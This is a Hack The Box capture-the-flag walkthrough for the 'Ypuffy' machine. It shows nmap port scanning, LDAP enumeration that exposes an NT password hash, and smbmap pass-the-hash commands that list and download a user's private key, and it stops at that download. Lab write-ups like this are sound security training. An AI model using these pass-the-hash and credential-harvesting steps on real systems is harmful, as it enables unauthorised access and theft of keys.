Hack The Box - Ypuffy

HackTheBox-Ypuffy.md

Techniques

Tools

• nmap

Setup

1. Add ypuffy.htb to the hosts file so we can refer to the host by name

   $ echo "10.10.10.107 ypuffy.htb" >> /etc/hosts

Port Scan

1. Scan for ports and services

   # Use nmap to find available TCP ports quickly
   $ ypuffy_tcp_ports=$( \
       nmap ypuffy.htb \
            -p- \
            --min-rate=1000 \
            -T4 \
       | grep ^[0-9] \
       | cut -d '/' -f 1 \
       | tr '\n' ',' \
       | sed s/,$// \
     )
   
   # Scan found ports for services
   $ nmap ypuffy.htb \
          -p ${ypuffy_tcp_ports} \
          -sV \
          -sC \
          -T4 \
          -oA nmap-tcp-foundports

Enumerate LDAP

1. Use nmap NSE script to determine basic LDAP info

   $ nmap ypuffy.htb \
          --port 389 \
          --script ldap-rootdse \
          -Pn
   ...
   PORT    STATE SERVICE
   389/tcp open  ldap
   | ldap-rootdse: 
   | LDAP Results
   |   <ROOT>
   |       supportedLDAPVersion: 3
   |       namingContexts: dc=hackthebox,dc=htb
   |       supportedExtension: 1.3.6.1.4.1.1466.20037
   |_      subschemaSubentry: cn=schema
   ...

2. Now use nmap to do a full LDAP search

   $ nmap ypuffy.htb \
          --port 389 \
          --script ldap-search \
          -Pn

3. You can also use ldapsearch to perform the same LDAP search as the nmap ldap-search NSE script

   $ ldapsearch -h ypuffy.htb \
                -x \
                -s sub \
                -b "dc=hackthebox,dc=htb"

Enumerate SMB

We found a sambaNT password hash in the LDAP search output above. Let's see if it gets us anywhere with SMB.

1. Use smbmap and the sambaNT hash we found to enumerate SMB with alice1978 creds

   # Notice how the hash is pasted twice into the password field, with a colo separator.
   $ smbmap -H ypuffy.htb \
            -u alice1978 \
            -p '0B186E661BBDBDCF6047784DE8B9FD8B:0B186E661BBDBDCF6047784DE8B9FD8B'
   [+] Finding open SMB ports....
   [+] Hash detected, using pass-the-hash to authentiate
   [+] User session establishd on ypuffy.htb...
   [+] IP: ypuffy.htb:445	Name: ypuffy.htb                                        
       Disk                               Permissions
       ----                               -----------
       alice                              READ, WRITE
       IPC$                               NO ACCESS

2. Add the -R flag to recursively list the contents of directories in the share(s) to which alice1978 has access

   $ smbmap -H ypuffy.htb \
            -u alice1978 \
            -p '0B186E661BBDBDCF6047784DE8B9FD8B:0B186E661BBDBDCF6047784DE8B9FD8B' \
            -R
   [+] Finding open SMB ports....
   [+] Hash detected, using pass-the-hash to authentiate
   [+] User session establishd on ypuffy.htb...
   [+] IP: ypuffy.htb:445	Name: ypuffy.htb                                        
       Disk                                        Permissions
       ----                                        -----------
       alice                                       READ, WRITE
       .\
       dr--r--r--     0 Wed Jun  5 14:07:31 2019	.
       dr--r--r--     0 Tue Jul 31 20:16:50 2018	..
       -r--r--r--  1460 Mon Jul 16 18:38:51 2018	my_private_key.ppk
       IPC$                                        NO ACCESS

3. Let's download that private key file using the --download option of smbmap

   $ smbmap -H ypuffy.htb \
            -u alice1978 \
            -p '0B186E661BBDBDCF6047784DE8B9FD8B:0B186E661BBDBDCF6047784DE8B9FD8B' \
            --download alice/my_private_key.ppk
   [+] Finding open SMB ports....
   [+] Hash detected, using pass-the-hash to authentiate
   [+] User session establishd on ypuffy.htb...
   [+] Starting download: alice\my_private_key.ppk (1460 bytes)
   [+] File output to: /lsec/HtB/Machines/Ypuffy/ypuffy.htb-alice_my_private_key.ppk